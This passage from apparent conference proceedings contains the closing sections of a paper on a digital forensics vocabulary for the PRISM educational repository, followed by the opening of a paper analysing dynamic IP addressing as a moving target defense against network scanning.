syllabus, and a rating was given to the level of similarity between the available vocabulary terms and<br />
those explicitly listed in the lab topic descriptions. A “Yes” value suggests that the terminology was<br />
sufficiently similar to allow someone not familiar with the content of the lab to effectively classify data<br />
using only a brief description. A “Partial” value means that one or more, but not all of the vocabulary<br />
terms are reflected in the lab topic description. In this case, a material might not be classified under all<br />
relevant terms, making it difficult to locate on the site. As an example, the lab described in the first row<br />
of Table 2 might only be classified as an “Email Forensics” material since “Documentation” and “Legal<br />
Process” are not explicitly mentioned in the description. Finally, a “No” designation is given if none of<br />
the relevant vocabulary terms are present in the lab topic description.<br />
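The Yes/Partial/No rating described above can be sketched as a simple text-overlap check, assuming the assigned vocabulary terms are compared literally against the syllabus wording (a simplification of the qualitative judgment actually applied):

```python
def rate_match(assigned_terms, lab_description):
    """Rate how well assigned vocabulary terms are reflected in a description.

    'Yes' if every term appears in the text, 'Partial' if some do, 'No' if none.
    """
    text = lab_description.lower()
    hits = [t for t in assigned_terms if t.lower() in text]
    if len(hits) == len(assigned_terms):
        return "Yes"
    return "Partial" if hits else "No"

# Row 1 of Table 2: only "Email Forensics" is explicit in the description.
desc = ("Email Forensics and the Forensic Template. "
        "Also write a preface justifying the forensic approach.")
print(rate_match(["Email Forensics", "Documentation", "Legal Process"], desc))
# Partial
```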
Table 2: Summary of the weekly lab topics in the MSIA 680 Computer Forensics course and related PRISM forensics vocabulary terms<br />
Lab Topics from Syllabus | Related PRISM Forensics Terms | Match<br />
Email Forensics and the Forensic Template. Also write a preface justifying the forensic approach. | Email Forensics; Documentation; Legal Process | Partial<br />
Snort alert data and Wireshark packet capture; Network Security Podcast Report | Network Forensics; Log Analysis | No<br />
Live Response, Volatile & Nonvolatile Data, Cache Dump | Live System Forensics | Yes<br />
RAPIER Tool Analysis. End with analysis of the Strength and Weakness of Forensic Tools and Processes | Log Analysis; Hidden Data Discovery; Documentation; Tool Validation* | No<br />
Registry Examination and Tool usage | Registry Analysis | Yes<br />
File Analysis Lab | Hidden Data Discovery | No<br />
Active Malware Discovery (Trojans) and Memory Examination | Malware Detection; Hidden Data Discovery | Yes<br />
Rootkit Examination and research of additional risks and methods of detection | Malware Detection | Yes<br />
Note: A positive in the Match column indicates that the seeded taxonomy terms were closely or<br />
exactly reflected in the Regis lab topic.<br />
This rudimentary analysis demonstrated that seeding the forensics vocabulary with terms extracted<br />
from a public literature search might be sufficient to allow a moderator to characterize the uploaded<br />
material without intimate knowledge of its contents. See Appendix 2 for a visual representation of this<br />
mapping in table form for the course MSIA 682, Network Forensics. It is clear, however, that the initial<br />
vocabulary could benefit from adjustments. For example, the lab description in row 2 of Table 2<br />
mentions “packet capture”. While this is not in the initial vocabulary, it is closely related to “Network<br />
Forensics” and “Packet Analysis”. Network Forensics was included in the initial list; Packet<br />
Analysis, while identified in the literature, was not, for the reasons described above. To address this, it<br />
might be appropriate to replace “Network Forensics” with “Packet Analysis” in the PRISM vocabulary.<br />
Alternatively, defining the relationship of these terms in PRISM (synonyms, subtopics, etc.) might<br />
create a more inclusive and useful search environment.<br />
4.4 Honing the vocabulary<br />
The artifact constructed through literature review is, as mentioned, a starting point in the development<br />
of an optimized digital forensics vocabulary for PRISM. It remains to be seen if these terms resonate<br />
with other users of the web portal or if different descriptors will be favored. Moreover, terminology<br />
changes over time, and PRISM’s vocabularies should be able to accommodate those changes. The<br />
authors plan to utilize new content and analytics data to identify discrepancies between the<br />
vocabulary defined above, and actual topics and terms utilized by PRISM users. PRISM records all<br />
searches performed on the site and generates reports listing common phrases. Searches are also<br />
tracked by Google Analytics, which provides a more in-depth view of searches executed on the site,<br />
as well as visitor behavior before and after the search. After a particular search is executed, Google<br />
services can be used to determine users’ preferred or selected materials. This capability can provide<br />
insight into how accurate and relevant the taxonomies are at any given time. As long as usage of the<br />
site continues, these tools will help PRISM moderators maintain relevant IA vocabularies with<br />
which content can be described.<br />
5. Conclusions<br />
IA is a rapidly changing field, and maintaining relevance is a difficult task. We are attempting to keep<br />
PRISM responsive to changes in the IA landscape. PRISM developers will continue to make<br />
adjustments based on the needs of the user community by allowing current literature and actual<br />
usage statistics to guide the development of organizational taxonomies. Explicitly attaching these<br />
relevant descriptors to site content allows administrators to produce intuitive, guided search<br />
functionalities, making it easier for users to locate the materials they need. Results using our own<br />
materials as a test case suggest that taxonomies constructed in this way could be effective for other<br />
users. A more rigorous evaluation will only be possible if site utilization increases and is sustained<br />
over a significant period of time. To this end, PRISM moderators recognize, and are prepared to<br />
absorb, the increased work required to properly organize content on the site as taxonomic complexity<br />
increases. This will hopefully make using the site more attractive to content developers and, in turn, to<br />
those seeking educational resources.<br />
6. Appendix 1: Terminology usage matrix<br />
Forensics Topics Totals<br />
Legal Process [1] [3] [5] [6] [11] [12] 6<br />
Log Analysis [1] [3] [5] [6] [11] [13] 6<br />
Data Acquisition [1] [2] [3] [12] [13] 5<br />
Data Decryption [1] [2] [5] [11] [12] 5<br />
Deleted Data Recovery [1] [3] [6] [11] [12] 5<br />
Email Forensics [2] [3] [5] [6] [13] 5<br />
Hidden Data Discovery [1] [2] [3] [11] [12] 5<br />
Steganography [1] [5] [11] [12] [13] 5<br />
Documentation [1] [2] [5] [13] 4<br />
Ethics [6] [11] [12] [13] 4<br />
Vincent Garramone and Daniel Likarish<br />
Network Forensics [3] [6] [11] [13] 4<br />
Incident Response [11] [12] [15] 3<br />
Live System Forensics [1] [3] [15] 3<br />
Malware Detection [3] [11] [12] 3<br />
Password Cracking [2] [5] [13] 3<br />
Registry Analysis [3] [6] [13] 3<br />
Hardware Identification [2] [6] 2<br />
Tool Development [3] [11] 2<br />
Web Browser Forensics [6] [13] 2<br />
Baselining [3] 1<br />
Application Analysis [6] 1<br />
Data Reconstruction [6] 1<br />
Forensic Planning 1<br />
Key Loggers [3] 1<br />
Dead System Forensics [15] 1<br />
Packet Analysis [6] 1<br />
Password Auditing [3] 1<br />
RFID Forensics [6] 1<br />
Tool Validation [11] 1<br />
Web Services [6] 1<br />
Evidence Collection and Handling [5] 1<br />
Key Authors Year Country Subject<br />
[1] Bem, D. and Huebner, E. 2008 Australia Curriculum<br />
[2] Berghel, H. 2003 USA Definition<br />
[3] Crowley, E. 2007 USA Curriculum (corporate)<br />
[5] Figg, W. and Zhou, Z. 2007 USA Curriculum<br />
[6] Francia, G. A. 2006 USA Curriculum<br />
[11] Troell, L., Pan, Y., and Stackpole, B. 2003 USA Curriculum<br />
[12] Troell, L., Pan, Y., and Stackpole, B. 2004 USA Curriculum<br />
[13] Wassenaar, D., Woo, D., and Wu, P. 2009 USA Curriculum<br />
[15] Yen, P., Yang, C., and Ahn, T. 2009 Taiwan Process<br />
7. Appendix 2: MSIA 682, Network Forensics course topics and activities<br />
mapped to PRISM forensics vocabulary<br />
Course Topic: Introduction to Security Monitoring<br />
Activity Description: Intro to security packet data structures based on the TCP/IP model<br />
Example of a granular Lab Activity: Identify the following packet structures by explaining what each packet is and what ports, protocols or codes each one uses, using the static packet captures<br />
PRISM Forensics vocabulary: Network Forensics<br />
Course Topic: Protocol Analysis<br />
Activity Description: After understanding packet data structures, examine different types of network services using standard sniffing tools<br />
Example of a granular Lab Activity: Explain the following tcpdump flags: -v, -n, -i, -r, -w, -e, -t, -x, -X, -s, -D, -q, -L, and identify which flags can be used more than once. Please use the 7.pcap file for this exercise.<br />
PRISM Forensics vocabulary: Network Forensics, Live Systems Forensics<br />
Course Topic: Metadata and Statistical Analysis<br />
Activity Description: Decompose packets for their content: metadata and other attributes, using packet capture files<br />
Example of a granular Lab Activity: Examine the files 1.pcap through 6.pcap using either Netdude or Wireshark, explaining what protocols are in use, whether they use UDP or TCP, and what ports are used for each protocol.<br />
PRISM Forensics vocabulary: Log Analysis, Hidden Data Discovery<br />
Course Topic: Session Data, Intrusion Detection and Alert Data<br />
Activity Description: Investigate layer three and four session data using the Network Security Management Framework<br />
Example of a granular Lab Activity: Please review the nfsen video to review the capabilities of nfsen (a web front end) and nfdump, the netflow collector/provider.<br />
PRISM Forensics vocabulary: Log Analysis, Hidden Data Discovery<br />
Course Topic: Normal, Suspicious and Malicious Traffic<br />
Activity Description: Examples of normal, suspicious and malicious traffic based on pcap files<br />
Example of a granular Lab Activity: Please examine pcap files 1-7 and identify the type of traffic and whether or not it would be normal, suspicious or malicious.<br />
PRISM Forensics vocabulary: Malware Detection, Live Systems Forensics, Hidden Data Discovery<br />
References<br />
Bem, D. and Huebner, E. (2008) “Computer forensics workshop for undergraduate students”, In Proceedings of<br />
the tenth conference on Australasian computing education, Vol. 78, Simon Hamilton and Margaret Hamilton<br />
(Eds.), Australian Computer Society, Inc., Darlinghurst, Australia, pp 29-33.<br />
Berghel, H. (2003) “The discipline of Internet forensics”, Communications of the ACM, Vol. 46, No. 8, pp 15-20.<br />
DOI= http://doi.acm.org/10.1145/859670.859687<br />
Cooper, S., Nickell, C., Piotrowski, V., Oldfield, B., Abdallah, A., Bishop, M., Caelli, B., Dark, M., Hawthorne, E.,<br />
Hoffman, L., Perez, L., Pfleeger, C., Raines, R., Schou, C., and Brynielsson, J. (2010) “An exploration of the<br />
current state of information assurance education”, SIGCSE Bull, Vol. 41, No. 4, pp 109-125.<br />
DOI=10.1145/1709424.1709457<br />
Crowley, E. (2007) “Corporate forensics class design with open source tools and live CDS”, J. Comput. Small<br />
Coll. Vol. 22, No. 4, pp 170-176.<br />
Davis, H., Carr, L., Hey, J., Howard, Y., Millard, D., Morris, D., and White, S. (2010) “Bootstrapping a culture of<br />
sharing to facilitate open educational resources”, IEEE Transactions on Learning Technologies, Vol. 3, No.<br />
2, pp 96-109.<br />
Dicheva, D. and Dichev, C. (2006) “Tm4l: creating and browsing educational topic maps”, British Journal of<br />
Educational Technology, Vol. 37, No. 3, pp 391-404.<br />
Figg, W. and Zhou, Z. (2007) “A computer forensics minor curriculum proposal”, J. Comput. Small Coll, Vol. 22,<br />
No. 4, pp 32-38.<br />
Francia, G. A. (2006) “Digital forensics laboratory projects”, J. Comput. Small Coll, Vol. 21, No. 5, pp 38-44.<br />
Garramone, V. and Schweitzer, D. (2010) “PRISM: A public repository for information security material”, In<br />
Proceedings from the 14th Annual Colloquium for Information Systems Security Education, Baltimore, MD.<br />
Irvine, C., Chin, S., and Frincke, D. (1998) “Integrating security into the curriculum”, Computer, Vol. 31, No. 12,<br />
pp 25-30.<br />
Moisey, S., Alley, M. and Spencer, B. (2006) “Factors affecting the development and use of learning objects”, The<br />
American Journal of Distance Education, Vol. 20, No. 3, pp 143-161.<br />
Null, L. (2004) “Integrating security across the computer science curriculum”, Journal of Computing Sciences in<br />
Colleges, Vol. 19, No. 5, pp 170-178.<br />
Peisert, S., Bishop, M., and Marzullo, K. (2008) “Computer forensics in forensics”, SIGOPS Oper. Syst. Rev., Vol.<br />
42, No. 3, pp 112-122. DOI= http://doi.acm.org/10.1145/1368506.1368521<br />
Schweitzer, D. and Boleng, J. (2009) “Designing web labs for teaching security concepts”, J. Comput. Small Coll.,<br />
Vol. 25, No. 2, pp 39-45.<br />
Shoemaker, D., Drommi, A., Ingalsbe, J.A., and Mead, N.R. (2007) “A comparison of the software assurance<br />
common body of knowledge to common curricular standards”, Software Engineering Education & Training,<br />
2007, pp 149-156.<br />
Theoharidou, M. and Gritzalis, D. (2007) “Common body of knowledge for information security”, Security &<br />
Privacy, IEEE, Vol. 5, No. 2, pp 64-67. DOI=10.1109/MSP.2007.32<br />
Troell, L., Pan, Y., and Stackpole, B. (2003) “Forensic course development”, In Proceedings of the 4th<br />
Conference on Information Technology Curriculum, 16-18 October, ACM, New York, NY, pp 265-269.<br />
DOI=http://doi.acm.org/10.1145/947121.947180<br />
Troell, L., Pan, Y., and Stackpole, B. (2004) “Forensic course development: one year later”, In Proceedings of the<br />
5th Conference on Information Technology Education, 28-30 October, ACM, New York, NY, pp 50-55.<br />
DOI=http://doi.acm.org/10.1145/1029533.1029547<br />
Wassenaar, D., Woo, D., and Wu, P. (2009) “A certificate program in computer forensics”, J. Comput. Small Coll.,<br />
Vol. 24, No. 4, pp 158-167.<br />
Weibel, S., Kunze, J., Lagoze, C. and Wolf, M. (1998) “Dublin Core Metadata for Resource Discovery”, RFC<br />
Editor. US<br />
Yen, P., Yang, C., and Ahn, T. (2009) “Design and implementation of a live-analysis digital forensic system”, In<br />
Proceedings of the 2009 International Conference on Hybrid Information Technology, 27-29 August, Vol.<br />
321, ACM, New York, NY, pp 239-243. DOI=http://doi.acm.org/10.1145/1644993.1645038<br />
Using Dynamic Addressing for a Moving Target Defense<br />
Stephen Groat, Matthew Dunlop, Randy Marchany and Joseph Tront<br />
Virginia Polytechnic Institute and State University, Blacksburg, USA<br />
sgroat@vt.edu<br />
dunlop@vt.edu<br />
marchany@vt.edu<br />
jgtront@vt.edu<br />
Abstract: Static network addressing allows attackers to geographically track hosts and launch network<br />
attacks. While technologies such as DHCP claim dynamic addressing, the majority of network addresses<br />
currently deployed are static for at least a session. Dynamic addresses, changing multiple times within a session,<br />
disassociate a user from a static address. This disassociation is important since a static address can be used to<br />
identify a host, making it feasible to target the host for attack. We propose using dynamic addressing, in which<br />
hosts’ addresses change multiple times per session, to create a moving target defense. Analyzing the primary<br />
factors which contribute to the security of dynamic addressing, we statistically evaluate the validity of this<br />
technique as a network defense. We then identify the optimal characteristics of a network-layer moving target<br />
defense that uses dynamic addressing.<br />
Keywords: moving target defense, network address security, privacy, dynamic addressing<br />
1. Introduction<br />
As computers and networks become embedded in critical services throughout society, the privacy and<br />
security implications of fixed network addresses expose users to tracking and attack. Specifically, at<br />
the link layer, Media Access Control (MAC) addresses associated with a network interface are<br />
susceptible to flooding and spoofing attacks. At the network layer, Internet Protocol (IP) addresses<br />
are susceptible to spoofing, tracking, and targeting. Both the MAC and IP addresses of servers and<br />
other host machines are usually static to allow for clients to successfully communicate. These static<br />
addresses often leave servers vulnerable to attack because these fixed addresses are easy targets to<br />
locate. If the host is compromised, an attacker can launch a denial of service (DoS) attack on the<br />
server that affects all attached clients. Another concern is mobile hosts, whose non-changing<br />
network addresses can be geotemporally tracked, compromising users' privacy.<br />
We explore the variables that impact how effectively dynamic IP addressing protects hosts and the<br />
impact these variables have on each other. One variable is the number of dynamic bits in the<br />
address, or bits available to change. The fewer dynamic bits, the more likely an attacker can use brute<br />
force techniques to correlate addresses. Another variable is the frequency of the address change. An<br />
address with fewer dynamic bits needs to change more often to avoid identification. No temporary<br />
address can remain static for too long without risking data correlation. A third variable to consider is<br />
the population density of the address space or subnet. A sparsely populated subnet would make<br />
address identification easier for the attacker since fewer addresses are in use. Alternatively, a densely<br />
populated subnet would make address identification considerably more challenging due to the<br />
additional hosts creating traffic on the network. Although it is easy to simply maximize all the<br />
variables, computational overhead prevents this. Minimizing computational expense is particularly<br />
important for power-constrained devices.<br />
To combat the security and privacy concerns of non-changing addressing, we analyze how dynamic<br />
network addressing would increase security, privacy, and reliability. Dynamic addressing refers to<br />
addresses in which some or all of the address changes non-deterministically, possibly even mid-session.<br />
Dynamic addressing prevents would-be attackers from tracking users over time and as they<br />
move through different networks, because the changing addresses cannot be correlated to a single<br />
user. Dynamic addressing also protects against traffic correlation by network sniffing attacks because<br />
of the difficulty of associating a user with a changing address. Dynamic addressing provides<br />
additional security by creating a moving target defense at the network layer that prevents attackers<br />
from targeting specific machines. The increased security offered by dynamic network addressing<br />
protects privacy and data for network users.<br />
To analyze the use of dynamic addresses in creating a moving target defense, the remainder of the<br />
paper is organized as follows. Static addresses and their associated security risks are discussed in<br />
Section 2. Related work is surveyed in Section 3, focusing on the need for address privacy.<br />
Stephen Groat et al.<br />
Sections 4 and 5 analyze the different factors which affect the security of a dynamic address and how<br />
these factors affect each other. Section 6 uses statistical simulation results to validate our security<br />
analysis of dynamic addressing factors. In Section 7, we discuss specific security advantages offered<br />
by dynamic addresses. Future work planned to demonstrate a dynamic addressing approach is<br />
discussed in Section 8 and we conclude in Section 9.<br />
2. Problem<br />
Static addresses are necessary to allow users to repeatedly find resources. Without a mechanism to notify<br />
users of address changes, they must rely on a single, static identifier to locate resources. For<br />
example, IP addresses, whether static or dynamic, are often connected with Domain Name System<br />
(DNS) names. DNS names are updated with the current IP address to facilitate location of resources<br />
on the Internet with an easily recognizable value. Without a static value connected to networked<br />
resources, whether DNS names or IP addresses, users would be unable to find the resources. Even<br />
Dynamic Host Configuration Protocol (DHCP) leased addresses, which are widely assumed to be<br />
dynamic, rarely change.<br />
While static addressing is critical to assist users in finding resources, static addresses allow malicious<br />
users to easily locate targets for attack. For example, DNS names and IP addresses are publicly<br />
available static addresses. These vectors allow attackers to easily conduct scans to locate target<br />
hosts. Once a target is located, the attacker can focus on the target found and assume that the<br />
target’s static identifier will not change. An attacker is able to make this assumption since identifier<br />
changes would interrupt service for valid users. To ensure the reliability and security of service, critical<br />
services must deploy some sort of moving target defense that changes static identifiers while allowing<br />
continuity of service for trusted users.<br />
3. Related work<br />
The need for an anonymous network address to maintain security and privacy has been explored.<br />
Reiter and Rubin (1999) developed a scheme, called Crowds, to maintain IP address anonymity from<br />
web sites. The protocol funnels web requests through other computers surfing the web. The<br />
effect is to create a crowd of users browsing web servers to hide web requests. Johnson et al. (2007)<br />
identified the need to anonymize addresses and built a trust model into Tor networks called Nymble.<br />
Nymble hides clients' IP addresses from servers. Shields et al. (2000) created another anonymity<br />
protocol named Hordes. Hordes’ focus is on creating a secure system that does not decrease network<br />
performance. All of these approaches focus on hiding the publicly available addresses by using<br />
complex support networks. We analyze the vectors that static addresses create for tracking and attack<br />
and recommend anonymizing the host address, which none of these three protocols addresses.<br />
Koukis et al. (2006) use web site signatures and fingerprinting to determine host addresses in<br />
anonymized IP logs. This method is ineffective for tracking dynamic hosts, further demonstrating the<br />
potential security and privacy advantages of dynamic addresses.<br />
A number of researchers have focused on the potential dangers resulting from network address<br />
tracking in the Internet Protocol version 6 (IPv6). Dunlop et al. (2011) identified the dangers posed by<br />
auto-configured addresses in IPv6 and presented a taxonomy of methods to obscure addresses.<br />
Narten, Draves, and Krishnan (2007) also identified a privacy concern with IPv6 addresses and<br />
proposed a potential solution called privacy extensions. Privacy extensions can create new addresses<br />
for users each time they connect to a subnet. Bagnulo and Arkko (2006) also proposed a solution<br />
aimed at protecting IPv6 addresses. Their approach, called Cryptographically Generated Addresses<br />
(CGAs), uses a self-generated public key to obscure an address for each subnet. Neither privacy<br />
extensions nor CGAs dynamically obscure addresses and addresses remain the same until the user<br />
terminates the session. Even though the addresses are obscured, they typically remain static long<br />
enough for a malicious third party to gather information about the user.<br />
While we have discovered no other academic work considering the security and privacy effects of<br />
addressing, two patents attempt to utilize dynamic addressing for security. A technique by Sheymov<br />
(2010) is designed with the goal of dynamic obscuration. Sheymov's objective behind dynamic<br />
obscuration is to provide intrusion protection from certain classes of network attacks. While<br />
Sheymov’s method uses dynamic addressing, it relies on an Intrusion Detection System to trigger<br />
address changes. We analyze consistent dynamic address changes that require no additional<br />
supporting systems. Fink et al. (2006) also propose a technique for dynamically obscuring host<br />
addresses called Adaptive Self-Synchronized Dynamic Address Translation (ASD). ASD uses<br />
symmetric keys established through a handshake process between a trusted sender and receiver<br />
enclave. This technique adds additional overhead due to repetition of the handshake process. A<br />
dynamic addressing technique must minimize overhead to be feasible for implementation. We analyze<br />
the factors that contribute to creating an effective dynamic addressing technique with the goal of<br />
determining the most efficient approach.<br />
4. Analysis of dynamic address factors<br />
There are three factors that contribute to an attacker’s ability to detect a target host on a subnet. The<br />
first factor is the number of dynamic bits in the address, which affects the size of the subnet. In a<br />
small address space, it is trivial for an attacker to check each address. The second factor is how often<br />
a target host’s address changes. If the address remains static, an attacker has as much time as<br />
necessary to locate the host. The third factor is the density of the address space, or the number of<br />
other hosts on an IP subnet. If an attacker does not know the target host’s address on a subnet,<br />
multiple other addresses will make identifying the target more difficult.<br />
For the purpose of our analysis, we investigate an attacker actively scanning an IP subnet with<br />
unicast addresses to identify a single targeted host. There are other methods an attacker can use to<br />
detect target hosts on a network. One such technique is a broadcast ping, allowed by IPv4. Many<br />
gateway devices block broadcast pings. Another method is to passively scan a subnet with a packet<br />
sniffer. This method has scope limitations as the attacker must have a presence on the same subnet<br />
as the target host. A unicast scan is more likely since there are multiple scan methods that avoid<br />
common security measures implemented on networks.<br />
4.1 Size of address<br />
The larger the address space, the more time it takes an attacker, on average, to locate the target<br />
address on an IP subnet. Table 1 illustrates this by comparing subnets of various sizes. In the table,<br />
we use the three most common Internet Protocol version 4 (IPv4) classful address blocks as<br />
examples. We also compare the typical subnet size used in IPv6. Scanning an entire class C address<br />
space is trivial and can be accomplished in less than a minute while scanning an entire IPv6 subnet is<br />
currently infeasible.<br />
Table 1: Comparison of addresses of various sizes, the scan time is based on a sequential scan with<br />
a 150 millisecond average round trip time for a single packet (GLORIAD 2010)<br />
Address Type Address Size (bits) Address Size (hosts) Scan Time<br />
IPv4 Class C Subnet 8 256 38 sec<br />
IPv4 Class B Subnet 16 65,536 3 hrs<br />
IPv4 Class A Subnet 24 16,777,216 29 days<br />
IPv6 Subnet 64 1.845·10^19 8.77·10^10 yrs<br />
So far we have mentioned the time it takes an attacker to scan the various address types in Table 1,<br />
however, this is the time it takes an attacker to scan the entire address space. The expected amount<br />
of time to locate a host is much less due to a paradox known as the birthday attack (Schneier 1996).<br />
According to the birthday attack, an attacker can expect to locate a target host in approximately 2^(m/2) attempts, where<br />
m is the number of bits in the address. This means that an attacker can expect to locate a host<br />
on a class C subnet in 2.4 seconds, a class B subnet in 38 seconds, and a class A subnet in 10<br />
minutes. A host on an IPv6 subnet can still expect to escape detection for over 20 years. No IPv4<br />
host that is not defending against active scanning can have any expectation of remaining hidden for a<br />
reasonable amount of time.<br />
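The scan-time arithmetic in Table 1 and the birthday estimate can be sketched as follows. The 150 ms per-probe round-trip time comes from the table caption; the 2^(m/2) expected-probe count is the birthday approximation assumed here.

```python
# Sketch of the scan-time arithmetic in Table 1, assuming a sequential scan
# at a 150 ms average round-trip time per probe and a birthday-paradox
# expectation of roughly 2**(m/2) probes to find one host in m dynamic bits.

RTT = 0.150  # seconds per probe (GLORIAD 2010 average)

def full_scan_seconds(bits):
    """Time to probe every address in a subnet with the given dynamic bits."""
    return (2 ** bits) * RTT

def expected_find_seconds(bits):
    """Expected time to hit the target under the birthday approximation."""
    return (2 ** (bits / 2)) * RTT

for name, bits in [("IPv4 Class C", 8), ("IPv4 Class B", 16),
                   ("IPv4 Class A", 24), ("IPv6 subnet", 64)]:
    print(f"{name}: full scan {full_scan_seconds(bits):.3g} s, "
          f"expected find {expected_find_seconds(bits):.3g} s")
```

For a class C subnet this reproduces the roughly 38-second full scan and 2.4-second expected detection quoted above.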
4.2 Frequency of address change<br />
The more frequently an address changes, the more difficult it is, on average, for an attacker to<br />
successfully locate and target a specific address. This is particularly true if the address changes more<br />
rapidly than an attacker can scan the subnet. As mentioned in Section 4.1, a larger address space<br />
takes longer to scan. It follows that addresses on a larger subnet need to change less frequently. To<br />
understand the relationship between changing and non-changing addresses, we analyze the number<br />
of attempts it takes an attacker to locate a static address on a subnet. Since the address is static, the<br />
probability of an attacker guessing the address increases with each subsequent guess. This<br />
86
Stephen Groat et al.<br />
probability follows a hypergeometric distribution. In the case of locating specific hosts on a subnet, the<br />
probability can be written as:<br />
P(N, h, r) = 1 - C(N - h, r) / C(N, r) (1)<br />
where N represents the total possible addresses in the subnet, h represents the number of target host(s), r<br />
represents the number of guesses an attacker takes in an attempt to find the target address(es), and C(n, k)<br />
denotes the binomial coefficient.<br />
The best case for the target host is if its address changes at the same rate that an attacker scans a<br />
single address. To provide the fairest assessment, we assume a scenario where the attacker is aware<br />
of the target host changing his/her address. As a result, the attacker randomizes his/her address<br />
guesses, allowing for repetition of addresses. This is in contrast to the normal approach where an<br />
attacker exhaustively scans a subnet without repetition. The probability of detecting the target host<br />
using an exhaustive search is slightly lower due to the possibility of a host address changing to a<br />
previously guessed address. In the attacker-aware scenario, the probability of detecting the target<br />
host remains the same with each subsequent guess and follows a cumulative binomial distribution, as<br />
shown in Equation 2:<br />
P(N, r) = 1 - (1 - 1/N)^r (2)<br />
where N again represents the total possible addresses in the subnet and r represents the attempt<br />
during which detections occurs. Figure 1 depicts the difference between the probabilities of a static<br />
address versus a changing address that follows a binomial distribution. A subnet of size 256 hosts is<br />
used as an example for this figure.<br />
Figure 1: The probability an attacker has of detecting a target address within r attempts, the solid line<br />
represents the probability given a static address while the dotted line represents the<br />
probability if the address is changed at the same rate it is scanned<br />
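The two curves in Figure 1 can be computed directly. This sketch assumes Equation 1 takes the hypergeometric form 1 - C(N-h, r)/C(N, r) and Equation 2 the binomial form 1 - (1 - 1/N)^r, consistent with the definitions of N, h, and r above.

```python
# Sketch of the two detection-probability curves in Figure 1 for a
# 256-address subnet: a static address searched without repetition
# (hypergeometric) versus an address that changes every guess (binomial).
from math import comb

def p_static(N, h, r):
    """Chance of hitting one of h static targets within r distinct guesses."""
    return 1 - comb(N - h, r) / comb(N, r)

def p_changing(N, r):
    """Chance of hitting a target that re-randomizes its address each guess."""
    return 1 - (1 - 1 / N) ** r

N = 256
# A static address is certain to be found by guess 256, while an address
# changing at the scan rate is still undetected about 37% of the time.
print(p_static(N, 1, N), p_changing(N, N))
```

The gap between the two values after N guesses is the security benefit the figure illustrates.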
It is unlikely, however, that a target address will change at the same rate an attacker scans a subnet.<br />
A target host can decrease the probability of detection compared to a static address by changing its<br />
address more frequently than the time it takes an attacker to scan the entire subnet. In this scenario,<br />
we assume the attacker knows the frequency of the address changes. We make this assumption to<br />
provide the attacker with the highest probability of target detection, and thus demonstrate the worst-case<br />
scenario for the target host. In this scenario, the probability of detecting a target address follows<br />
Equation 1 until the address changes. After the address changes, Equation 1 resets to r=1. If we<br />
classify each address change as a round, the probability of detection within z rounds can be written as:<br />
P(N, r, z) = 1 - (1 - r/N)^z (3)<br />
Figure 2 also utilizes a subnet of 256 addresses. The plot illustrates the difference between a static<br />
address and addresses that change after an attacker scans r addresses. The address that changes<br />
every round (r=1) follows a binomial distribution. The figure demonstrates that as the frequency of<br />
change approaches the time it takes an attacker to scan a single address, Equation 3 converges to<br />
Equation 2. Alternatively, as the attacker is able to scan more of the address space between address<br />
changes, Equation 3 converges to Equation 1.<br />
Figure 2: The probability an attacker has of detecting a static target address within 256 attempts<br />
versus the probability of detecting an address that changes after an attacker scans r<br />
addresses over z rounds<br />
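Assuming Equation 3 takes the closed form P = 1 - (1 - r/N)^z, which matches the convergence behavior just described (r = 1 recovers the binomial case, and one full sweep of the subnet recovers the static case), the round-based probabilities can be sketched as:

```python
# Sketch of round-based detection under the assumed closed form
# P = 1 - (1 - r/N)**z: the attacker scans r distinct addresses per round
# and the single target re-randomizes its address between rounds.

def p_rounds(N, r, z):
    """Chance of detecting the target within z rounds of r guesses each."""
    return 1 - (1 - r / N) ** z

N = 256
print(p_rounds(N, 1, 256))  # r = 1: matches the binomial case (~0.63)
print(p_rounds(N, N, 1))    # r = N: one full sweep guarantees detection
```

Between these extremes, more frequent address changes (smaller r per round) lower the attacker's cumulative probability for the same total scanning effort.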
4.3 Density of address space<br />
The more sparsely populated the address space is, the more difficult it is for an attacker to pinpoint<br />
the target host. The reason for this is that the attacker does not know the address of the target host. If<br />
the attacker knew the address, he/she would not need to scan the subnet. Assuming the attacker has<br />
no additional information pertaining to the identity of a host (e.g., operating system), a successful<br />
scan reply provides no indication that the discovered host is the target.<br />
The probability of detecting a host increases with the number of hosts on a subnet. The probability of<br />
detecting a host can be calculated using Equation 1. In Section 4.2, h=1 to represent a single target<br />
host. In this case, h is equal to the number of total hosts on the subnet. As already mentioned,<br />
successful detection does not indicate that the host detected is the target host.<br />
This factor degrades an attacker’s capability of detecting a target host. In the single host scenario<br />
discussed in Section 4.2, locating a target takes time. Once the target is located, though, the attacker<br />
knows he/she has identified the target host because there are no other hosts on the subnet. With<br />
multiple hosts on the subnet, an attacker will get false positives. By false positive, we mean that the attacker<br />
receives an indication of success when the located host is not the target. The false positive rate<br />
increases with the number of non-target hosts on the subnet. Unlike a password attack where<br />
success provides an attacker access to a machine, a successful scan reply tells the attacker little<br />
about whether the discovered host is the target host. Even in the case of multiple discovered hosts,<br />
the attacker does not know which host is the target. Of course, with additional information, such as<br />
operating system or protocol, the attacker can filter out hosts not matching a certain profile.<br />
5. Interaction of dynamic address factors<br />
The three factors described in Section 4 are not independent. As certain factors increase, other<br />
factors can decrease while still maintaining the same overall probability of detection. For example,<br />
there is a relationship between address size and frequency of address change. There is also a<br />
relationship between subnet density and frequency of address change.<br />
Increasing the size of the address allows for the frequency of the address change to decrease without<br />
degrading security. As the size of the address increases linearly, the size of the address space<br />
increases exponentially. The increased address space requires more time and resources from an<br />
attacker to exhaustively scan. Beyond a certain address size, an attacker cannot exhaustively scan<br />
the exponentially growing network quickly. Therefore, it is possible for the host to decrease the<br />
frequency of the address change without increasing the probability it will be detected. Since each<br />
address change requires computation on the part of the host, decreasing the frequency of address<br />
change is desirable. A larger address space can result in lower computational requirements with the<br />
same probability of detection as that of a smaller address space with more frequent address changes.<br />
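The effect of address size on scan time can be made concrete with a back-of-the-envelope calculation. The sketch below is illustrative only; the probe rate is an assumed figure, not a measurement from our experiments.

```python
def exhaustive_scan_years(address_bits, probes_per_second=1_000_000):
    """Worst-case time (in years) for an attacker to probe every
    address in a 2**address_bits space at the given probe rate."""
    seconds = 2 ** address_bits / probes_per_second
    return seconds / (365 * 24 * 3600)

# Each additional address bit doubles the attacker's worst-case work,
# so the scan time grows exponentially in the address size:
ipv4_host_space = exhaustive_scan_years(32)  # roughly an hour of scanning
ipv6_iid_space = exhaustive_scan_years(64)   # hundreds of thousands of years
```

At a 64-bit address size, even this generous probe rate leaves exhaustive scanning infeasible, which is why the host can afford to change its address less often.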
Density of address space also affects frequency of address change. As the density of the address<br />
